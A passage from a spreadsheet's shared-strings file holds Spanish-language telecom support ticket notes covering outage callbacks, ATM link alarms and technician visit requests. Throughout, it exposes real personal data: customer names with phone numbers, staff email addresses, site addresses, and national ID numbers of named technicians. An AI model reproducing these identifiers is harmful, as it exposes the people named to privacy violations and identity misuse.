    <t>F4592059</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN ELIAS SIERRA 50494560221 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001845389</t>
  </si>
  <si>
    <t>F4592065</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MANUEL JIMENEZ 35882871 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001695530</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MANUEL JIMENEZ 35882871 MENCIONA QUE YA NO ESTA EN PR POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 8 HRS
-ID 1001650638</t>
  </si>
  <si>
    <t>F4592080</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE:
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: LUNES, 6 DE JUNIO DE 2022 17:16PARA: JOSUE ALEJANDRO HERRERA SALAZAR &lt;JOSUEA.HERRERA@CLARO.CR&gt;; SERVICEDESKTI &lt;SERVICEDESK@GRUPOMONGE.COM&gt;; TELECOMUNICACIONES@GRUPOMONGE.COM &lt;TELECOMUNICACIONES@GRUPOMONGE.COM&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE " CC_GMG_GT_INTERNET_CUBULCO_BAJAVERAPAZ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2080
ID: 313900406T
IDENTIFICADOR DEL CLIENTE:  CC_GMG_GT_INTERNET_CUBULCO_BAJAVERAPAZ
UBICADO EN:  INTERNET_AVE. BARRIO SNTIAGO 1-68 ZONA 1 CUBULCO BAJA VERAPAZ BAJA VERAPAZ CUBULCO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4592087</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAIME REPRESA 75604857 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA SE LLAME A 61982997
-ID 1001729038 - 1001729791</t>
  </si>
  <si>
    <t>SE LLAMA A PR 75604857 CONTESTA EL SEÑOR GILMAN INDICA QUE AUN SE ENCUENTRA CAIDO EL SERVICIO || SE NOTIFICA A GESTOR **
-ID 1001785935
**</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE, JAIME REPRESA, INDICA QUE ESTARA DANDO SEGUIMIENTE HASTA EL DIA JUEVES 09/06 A EN HORARIO HABIL, YA QUE HASTA ESE DIA SE ENCONTRARA EN SITIO, SE LE INDICA QUE NO SE OBSERVA CABLE DE RED CONECTADO EN FA3, POR LO QUE MENCIONA QUE ESTARA REVISANDOLO, PERO QUE VALIDARA CIERRE HASTA EL DIA MENCIONADO.
NÚMERO: 0050375604857
FIN: HOY, 14:31
ID DE LLAMADA: 1001813647</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE JAIME REPRESA 75604857 RESPONDE PERSONAL DE SEGURIDAD INDICANDO QUE  JAIME REPRESA  YA NO SE ENCUENTRA EN PR POR LO QUE SOLICITA SEGUIMIENTO MAÑANA A LAS 9:00 HRS
-ID 1001634614 - 1001635008</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAIME REPRESA 75604857 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001703947</t>
  </si>
  <si>
    <t>SE LLAMA A PR 75604857 ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 1001732442</t>
  </si>
  <si>
    <t>F4592094</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SONIA CUGUA 54389036 ENVIA DIRECTO A BUZON
-ID 1001655885</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS ARENALES 54298112 MENCIONA QUE ES EL UNICO NUMERO DE PR PERO SOLICITA SE DE SEGUIMIENTO MAÑANA A LAS 8:00 HRS
-ID 1001656376</t>
  </si>
  <si>
    <t>F4592117</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL RODRIGUEZ 70527029 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001656935</t>
  </si>
  <si>
    <t>F4592121</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JENNY BONILLA AL 79300569 - 78773472 CLIENTE NO RESPONDE NINGUN NUMERO ||
SE INTENTARA LUEGO**
ID 1001642025 - 1001642441
**</t>
  </si>
  <si>
    <t>F4592146</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 78706942 - 72206477 MENCIONA QUE ESTARA VALIDANDO POR LO QUE SOLICITA LLAMADA PARA LAS 10:20
-ID 1001706443 - 1001706648 - 1001707171</t>
  </si>
  <si>
    <t>CLIENTE ATIENDE CABALLERO INDICA QUE SERVICIO SE ENCUENTA OPERATIVO Y RESTABLECIDO, SOLICITA SEGUNDA LLAMADA MAÑANA A PARTIR DE LAS 8 AM PARA CONFIRMAR CON PERSONAL DEL TURNO MATUTINO----</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PATRICIA CORTEZ 25641777 ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 1001689831</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 78706942 ENVIA DIRECTO A BUZON
-ID 1001689613</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PATRICIA CORTEZ 25641777 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001696500</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE LILIAN 72206477 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001738984 - 1001739435</t>
  </si>
  <si>
    <t>SE LAMA A CLIENTE 25641777 QUIEN SOLICITA SE LLAME A PR 72206477 - 78706942
-ID 1001705817</t>
  </si>
  <si>
    <t>F4592148</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL  24207200 EXT 2395CONTESTA EL SEÑOR ADAN RAMIREZ INDICA QUE TRASLADARA LA LLAMADA AL AREA DE MONITOREO PERO SE CORTA SE INTENTA NUEVAMENTE MARCANDO LA EXT PERO IGUAL SE CORTA LLAMADA || SE INTENTARA LUEGO  **
ID 100696683 - 1001697031
**
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL  24207200 EXT 2395 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001681134 - 1001681158
**</t>
  </si>
  <si>
    <t>F4592160</t>
  </si>
  <si>
    <t>SE HABLA CON SALVADOR 32510901 , SE LE CONSULTA SI SE LOGRO REALIZAR ALGUN TIPO DE REPARACION CON EL UPS YA QUE AUN CONTINUA GENERANDO REINCIDENCIA POR REINICIOS CONSTANTES EN CPE, INFORMA QUE AUN NO LE LLEVAN LAS BATERIAS DEL UPS Y LOS EQUIPOS ESTAN CONECTADOS A LA ENERGIA COMERCIAL, LA CUAL ES MUY INESTABLE EN EL LUGAR SEGUN INDICA, SE DEBE VALIDAR CON PERSONAL DE LA CENTRAL PARA VER SI SE TIENE ALGUN AVANCE
ID
1001646265
COLA:
NOMBRE: A: 32510901
NÚMERO: 32510901
DURACIÓN: 0:02:52
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 32510901
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 6/06/2022 17:17:42</t>
  </si>
  <si>
    <t>SE HABLA CON SALVADOR 32510901 , SE LE CONSULTA SI SE LOGRO REALIZAR ALGUN TIPO DE REPARACION CON EL UPS YA QUE AUN CONTINUA GENERANDO REINCIDENCIA POR REINICIOS CONSTANTES EN CPE, INFORMA QUE AUN NO LE LLEVAN LAS BATERIAS DEL UPS Y LOS EQUIPOS ESTAN CONECTADOS A LA ENERGIA COMERCIAL, LA CUAL ES MUY INESTABLE EN EL LUGAR SEGUN INDICA, SE DEBE VALIDAR CON PERSONAL DE LA CENTRAL PARA VER SI SE TIENE ALGUN AVANCE. SE TOMA COMO REFERENCIA TT F4535115  EN DONDE SE LE INFORMO A CLIENTE LA SITUACION. TT ACTUALMENTE CERRADO.
ID
1001646265
COLA:
NOMBRE: A: 32510901
NÚMERO: 32510901
DURACIÓN: 0:02:52
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 32510901
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 6/06/2022 17:17:42</t>
  </si>
  <si>
    <t>F4592166</t>
  </si>
  <si>
    <t>CLIENTE DAVID BONILLA 77003121 INDICA VIA TELEFÓNICA QUE CONTINÚAN VERIFICANDO DE SU LADO EN CONJUNTO CON SU PROVEEDOR, SOLICITA SE LE LLAME POR LA TARDE. ID: 2001196549</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DAVID BONILLA 77003121 QUIEN COMENTA QUE ESTÁN REALIZANDO PRUEBAS CON SU PROVEEDOR, QUIENES LE COMENTARON QUE ENCONTRARON ALGUNOS INCONVENIENTES EN SU PBX, POR LO QUE INDICA QUE CONTINUARÁN VERIFICANDO DE SU LADO Y ESTARÁ INFORMANDO VÍA CORREO. ID:1001979899</t>
  </si>
  <si>
    <t>CLIENTE DAVID BONILLA 77003121 INDICÓ QUE SE LE LLAME EN 20 MINUTOS PARA REALIZAR LAS PRUEBAS, JORGE CHAVARRIA ENTERADO DEL HORARIO
ID DE LLAMADA: 1001968225</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE DAVID BONILLA 77003121, INDICA QUE NO SE ENCUENTRA EN SUS OFICINAS INDICA QUE SE LE ESCRIBA A DAVID_RODRIGUEZ@BACCREDOMATIC.SV
ID DE LLAMADA: 1001782758</t>
  </si>
  <si>
    <t>F4592168</t>
  </si>
  <si>
    <t>SE NOTIFICA A CLIENTE ALARMA EN EL MONITOREO,SE DEBE VALIDAR SI EQUIPO ASMI ESTA ENERGIZADO EN ATM
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM0943 SOLICITAMOS SU APOYO PARA VALIDAR QUE EQUIPO DE ENLACE PRINCIPAL DE MARCA ASMI QUE CONECTA AL EQUIPO DE MARCA TELDAT EN ATM ESTE ENERGIZADO, YA QUE PUERTO WAN SE OBSERVA EN ESTADO DOWN EN EL TELDAT. ACTUALMENTE ESTÁ OPERATIVO ÚNICAMENTE POR 3G. QUEDO AL PENDIENTE.
TICKET: F4592168
ID: 47501731T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM0943
UBICADO EN: CAJERO 943 FARMACIA MODERNA 4 AV. 4-00 ZONA 1 STA ELENA PETEN
SALUDOS.</t>
  </si>
  <si>
    <t>TAVSA INFORMA QUE ESTARA VALIDANDO
MONITOREO FALLAS ATMS &lt;OPERADORES.ATM4@TAV.COM.GT&gt;
BUEN DÍA
ENTERADO, CON GUSTO SE ESTARA VALIDANDO. || SE DEBE VALIDAR SI EQUIPO ASMI ESTA ENERGIZADO EN ATM
SALUDOS.</t>
  </si>
  <si>
    <t xml:space="preserve">CLIENTE SOLICITA APOYO A TAVSA
ORLANDO RAMIREZ &lt;ORAMIREZ@5B.COM.GT&gt;
TAVSA BUENA TARDE SU APOYO CON LO SOLICITADO POR CLARO.
ORLANDO RAMIREZ¿
ANALISTA DE ATMS
PBX: 2420¿7200
EXT.
2359
	</t>
  </si>
  <si>
    <t>CLIENTE INFORMA QUE SE ENVIA SUPERVISOR A VERIFICAR
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
BUENA TARDE SE ENVIO SUPERVISOR A VERIFICAR.
SERVICIOS 5B
PBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>F4592196</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANDREA MOLINA AL 2133-9603 -7860-2964 INDICA QUE SIGUE EL INCONVENIENTE QUE NO LA DEJA ACCEDER A VARIOS SITIO Y SOLOICITA VISITA TECNICA PARA QUE SE REVISE EN CONJUNTO CON SU PERSONAL INDICA | SE NOTIFICA A GESTOR **
ID 1001751288 - 1001751934
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDREA MOLINA 78602964 - 21339603 MENCIONA QUE YA ESTAN GESTIONADOS LOS PERMISOS DE PERSONAL TECNICO
-ID 1001996192 - 1001996443</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS###
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 8 DE JUNIO DE 2022 11:02
PARA: ANDREA ISABEL MOLINA GONZALEZ &lt;AMOLINA@ASSANET.COM&gt;; JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; JONATAN MENA &lt;JMENA@ASSANET.COM&gt;; DARWIN HUSSEIN ESPANA NORIEGA &lt;DARWINH.ESPANA@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SITIOS SIN ACCESO
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIOASSA COMPA¥IA DE SEGUROS,SOCIEDAD ANONIMA  |ID1028486 | EDIFICIO ASSA, CALLE LOMA LINDA, NO. 265, COL. SAN BENITO, SAN SALVADOR
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
DUI                     CODIGO           EMPLEADO
01968544-3       9407           WALTER ERNESTO RODRIGUEZ PEREZ
01101266-2       4605             JOSE SALVADOR PORTILLO VELASQUE
04086816-7        12404          GERARDO ANTONIO MINERO
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4592201</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ADIN VELASQUEZ AL 40529383 NO RESPONDE SE INTENTARA LUEGO **
ID 1001691028 - 1001691162
**</t>
  </si>
  <si>
    <t>DEBIDO A QUE CLIENTE NO CONTESTA, SE LLAMA AL GDN, CONTESTA SEÑORITA YESIKA Y VALIDA ##
RESULTADO: LLAMADA HECHA
NOMBRE: 77904850
NÚMERO: 77904850
INICIO: HOY, 10:16
FIN: HOY, 10:16
DURACIÓN: 0:30
ID DE LLAMADA: 1001729733</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ADIN VELASQUEZ AL 40529383 NO RESPONDE SE INTENTARA LUEGO **
ID 1001706475
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEX BALLEJO AL 56956115 NO RESPONDE ENVIA DIRECTO A BUZON ||
SE INTENTARA LUEGO **
ID 1001706125
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEX BALLEJO AL 56956115 NO RESPONDE ENVIA DIRECTO A BUZON ||
SE INTENTARA LUEGO **
ID 1001691472
**</t>
  </si>
  <si>
    <t>F4592207</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RUBY CHAVARRIA AL 30130082 INDICA QUE EL SERVICIO ESTA ESTABLE Y OPERATIVO **
ID 1001695304
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RUBY CHAVARRIA 30130082 SE TENIA EN LINEA A CLIENTE PERO SE PIERDE EL AUDIO, SE INTENTA VOLVER A LLAMAR PERO CORTA LA LLAMADA
-ID 1001657615 - 1001657793 - 1001657767</t>
  </si>
  <si>
    <t>F4592217</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RUTH RODRIGUEZ AL 31870657 NO RESPONDE ENVIA A BUZON ||
SE INTENTARA LUEGO **
ID 1001681536
**</t>
  </si>
  <si>
    <t>F4592223</t>
  </si>
  <si>
    <t>SE NOTIFICA ALARMA EN EL MONITOREO PROACTICO
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM04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2223
ID: 47500979T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM0472
UBICADO EN: ATM 472, AG. BANRURAL CUBULCO, EDIF. MUNICIPAL BARRIO SANTIAGO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4592237</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE JOSUE VALLEJOS QUIEN INDICA QUE TODAVIA NO TIENEN UN FECHA EXACTA PARA LA REPARACION DE LA PBX. PERO QUE EL VIERNES VAN A VIAJAR A LA CIUDAD CAPITAL Y VAN A VER EL TEMA.
SE TENDRA ABIERTO EL TICKET HASTA EL DIA MARTES 14/06.
1001880746
COLA:
NOMBRE: A: 55857620
NÚMERO: 55857620
DURACIÓN: 0:01:45
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 55857620
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 7/06/2022 18:40:43</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.  CONTESTAN EN RECEPCION INDICAN QUE JOSUE VALLEJOS NO ESTA EN LAS INSTALACIONES.
Y SE LE DIO EL NUMERO DE ACCESOS PARA QUE LLAME Y PODER VALIDAR EL SERVICIO.
3001407240
COLA:
NOMBRE: A: 55857620
NÚMERO: 55857620
DURACIÓN: 0:00:19
ESTADO: CONECTADA
DETALLES: 55857620
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 15/06/2022 15:33:49</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JOSUE VALLEJOS. PERO NO CONTESTA. SE LLAMARA ENSEGUIDA.
3001398333, 3001398510, 3001398561
COLA:
NOMBRE: A: 55857620
NÚMERO: 55857620
DURACIÓN: 0:00:23
ESTADO: MARCANDO
DETALLES: 55857620
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 15/06/2022 15:07:03</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JOSUE VALLEJOS PERO ENVIA A BUZON.
3001407240
COLA:
NOMBRE: A: 55857620
NÚMERO: 55857620
DURACIÓN: 0:00:19
ESTADO: CONECTADA
DETALLES: 55857620
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 15/06/2022 15:33:49</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE JOSUE VALLEJO A QUIEN SE LE INDICO QUE EL TECNICO ESTARA LLEGANDO A LAS 9:00AM EL DIA DE MAÑANA.
1001671021
COLA:
NOMBRE: A: 55857620
NÚMERO: 55857620
DURACIÓN: 0:00:21
ESTADO: CONECTADA
DETALLES: 55857620
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 6/06/2022 20:18:17</t>
  </si>
  <si>
    <t>CLIENTE JOSUE INDICA QUE SE LE CONTACTE EL LUNES 13/06 YA QUE ESTAN  TRABAJANDO CON SU PBX EN LA CAPITAL. SE  DARÁ SEGUIMIENTO EL DIA SOLICITADO POR EL CLIENTE.
2001358660
COLA:
NOMBRE: A: 55857620
NÚMERO: 55857620
DURACIÓN: 0:00:27
ESTADO: CONECTADA
DETALLES: 55857620
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 10/06/2022 08:29:10</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JOSUE PERO ENVIA A BUZON.
1001887556
COLA:
NOMBRE: A: 55857620
NÚMERO: 55857620
DURACIÓN: 0:00:11
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55857620
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 7/06/2022 19:45:25</t>
  </si>
  <si>
    <t>F4592252</t>
  </si>
  <si>
    <t>|| SE ENIVA CORREO A UNINET SOLICITANDO ACCESOS || PENDIENTE CONFIRMACION
ERITO FERNANDO TECU XITUMUL
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 70014OH ::: TICKET CNOC IMBBL004138 ::: LINK FLAPPING
BUENA TARDE ESTIMADO CLIENTE.
EN SEGUIMIENTO AL SERVICIO 70014OH || UBICADO: COLONIA PALMIRA SALIDA A TELA, FRENTE A ESCUELA JUAN MARESMA, CONTIGUA EMPRESA ENERGÍA HONDURAS.
LE COMENTO SE ESTÁ COORDINANDO UNA VISITA TÉCNICA POR LO CUAL SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR ACCESOS PARA NUESTRO PERSONAL, ASÍ COMO UN HORARIO EN EL QUE NOS PUEDAN ATENDER.
ADJUNTO LOS DATOS DEL PERSONAL TÉCNICO ASIGNADO.
FAVIO SANTOS 1807-1993-00740
OMAR GUARDADO 0413-1984-00606
QUEDAMOS ATENTOS A SUS COMENTARIOS PARA PROCEDER.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA EL SEÑOR OSWALDO INDICA QUE AUN NO CUENTAN CON LA INFORMACION SOLICITADA QUE CL AUN NO RESPONDE QUE CUANDO LES COMPARTAN LA INFORMACION ELLOS NO LA ESTARAN ENVIANDO **
ID 1001681877
**</t>
  </si>
  <si>
    <t>F4592262</t>
  </si>
  <si>
    <t>CLIENTE ERICK SCHREI 52019413 UBICA EQUIPO TELLABS EL CUAL TIENE TODAS LAS LUCES ENCENDIDAS, CLIENTE REINICIA EL EQUIPO PERO EL E1 NO RESTABLECE. POSIBLEMENTE EQUIPO SE DAÑÓ. CLIENTE SOLICITA VISITA TÉCNICA. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4592272</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: LUNES, 6 DE JUNIO DE 2022 20:48
PARA: ALVAREZ TOMAS, KENDY FABIOLA &lt;KENDY.ALVAREZ@CLARO.COM.HN&gt;; LEMUEL A. OCHOA / BANCO DEL PAIS &lt;LEMUELO@BANPAIS.HN&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; CLIENTES VIP HN &lt;CLIENTES.VIP@CLARO.COM.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: GRUPO MONITOREO Y DESPACHO / BANPAIS &lt;MONITOREO_DESPACHO@BANPAIS.HN&gt;; GRUPO DE COMUNICACIONES BP / BANPAIS &lt;COMUNICACIONES@BANPAIS.HN&gt;; GRUPO OPERACIONES DATA CENTER / BANPAIS &lt;DATACENTER@BANPAIS.HN&gt;; SERGIO AYALA FIGUEROA &lt;SERGIO.AYALA@CLARO.COM.HN&gt;
ASUNTO: RE: APERTURA DE TICKETT|| WAN-CLARO :: ATM :: 4TO BATALLON :: CID :: 887760
BUENAS TARDES ESTIMADOS(A):
SE VALIDA ENLACE ACTIVO NUEVAMENTE POR FAVOR SU AMABLE APOYO VALIDANDO SIN AÚN PERSISTEN LOS INCONVENIENTES. DE NUESTRO LADO NO SE TOMARON ACCIONES CORRECTIVAS. GRACIAS DE ANTEMANO
&lt;ALCEHNVMN1D1EIM1&gt;PING -VP BANPAIS 192.168.9.82
  PING 192.168.9.82: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 192.168.9.82: BYTES=56 SEQUENCE=1 TTL=255 TIME=3 MS
    REPLY FROM 192.168.9.82: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 192.168.9.82: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 192.168.9.82: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 192.168.9.82: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 192.168.9.82 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/3 MS</t>
  </si>
  <si>
    <t>F4592349</t>
  </si>
  <si>
    <t>SE HABLÓ CON JAVIER SÁNCHEZ/CLIENTE 42980211 PIDE SE MANTENGA SERVICIO EN MONITOREO PARA MAÑANA A LAS 20:00 HORAS.</t>
  </si>
  <si>
    <t>F4592355</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SHANON BATREZ AL 55140082 CLIENTE SOLICITA QUE SE DEJE EN OBSERVACION 24 HRS || SE NOTIFICA A GESTOR **
ID 1001688613
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SHANON BATREZ AL 55140082 NO RESPONDE || SE INTENTARA LUEGO**
ID 1001682732
**</t>
  </si>
  <si>
    <t>F4592419</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA EL SEÑOR JUAN HERNANDEZ  INFORMA QUE EL ENLACE YA ESTA ESTABLE PERO SOLICITA QUE SE MANTENGA EN OBSERVACION DURANTE 2 HRS **
ID 1001682939
**</t>
  </si>
  <si>
    <t>F4592479</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR VICTOR NUÑEZ CONFIRMA SERVICIO ESTABLE Y
AUTORIZA CIERRE DEL TICKET **
ID 1001683795
**</t>
  </si>
  <si>
    <t>F4592501</t>
  </si>
  <si>
    <t>*- DAMARIS 24139400  EXT 82770 (CLIENTE) COMENTA QUE ELLA ES LA ENCARGADA DE AGENCIA, SE DEJA EN CONFERENCIA CON DARWIN ESPAÑA (GESTOR) PARA VERIFICACIONES Y/O PRUEBAS -*
-*</t>
  </si>
  <si>
    <t>***--- SE LOCALIZA HORARIO DE AGENCIA PARA CONTINUAR PRUEBAS --**
LUNES A VIERNES DE 8:00 A 19:00 HORAS, SÁBADO DE 8:00 A 19:00 HORAS, DOMINGO DE 8:00 A
19:00 HORAS</t>
  </si>
  <si>
    <t>SE LLMA A CLIENTE  30727797 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001770022</t>
  </si>
  <si>
    <t>***-- SE CONSULTA VÍA SKYPE A CNOC SI HAY ALGO PENDIENTE  -***</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 24139090 EXT 82770 NO SE LOGRA LA COMUNICACION, SE INTENTARA LUEGO
-ID 1001698899</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL 30727797 RESPONDE MARLON MENCIONA QUE LA AGENCIA APERTURA A LAS 9 POR LO QUE SOLICITA SE LLAME A LAS 9:15 AL NUMERO 24139400  EXT 82770
-ID 1001699341</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO AL 24139090 EXT 82770 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001686001
**</t>
  </si>
  <si>
    <t>F4592575</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESTEBAN CESPEDES S AL 506 4109 3087 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001684281
**</t>
  </si>
  <si>
    <t>***--- CL REPORTA QUE EL SERVICIO CONTINUA CAIDO --**
DE: CRLAAMNOC MAILBOX [MAILTO:CRLAAMNOC_MAILBOX@DXC.COM]
ENVIADO EL: MARTES, 7 DE JUNIO DE 2022 04:21
PARA: CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; OCOX PIRIR, AXEL ANTONIO &lt;A.OCOXPIRIR@DXC.COM&gt;; EVELIN MELISA MEJIA GARCIA &lt;EVELINM.MEJIA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
CC: CAMACHO SOTO, MARCO VINICIO &lt;M.CAMACHOSOTO@DXC.COM&gt;; GREGORIO MARROQUIN, RONY NOEL &lt;RONY-NOEL.GREGORIO-MARROQUIN@DXC.COM&gt;; MELENDEZ ALVAREZ, SOFIA &lt;S.MELENDEZALVAREZ@DXC.COM&gt;; PACHECO, JEAN CARLOS &lt;JEAN-CARLOS.PACHECO.PALACIOS@DXC.COM&gt;; GONZALEZ, JORGE ALEJANDRO &lt;J.GONZALEZ4@DXC.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; LOPEZ ZELEDON, LUIS ALEJANDRO &lt;L.LOPEZZELEDON@DXC.COM&gt;
ASUNTO: RE: FEMSA | INC23545575 | TUNNELGREE_ENLACEINTERNETCLARO_CAMOJA | GUATEMALA-VOLCANES-CAMOJA-DISTRIBUIDORA
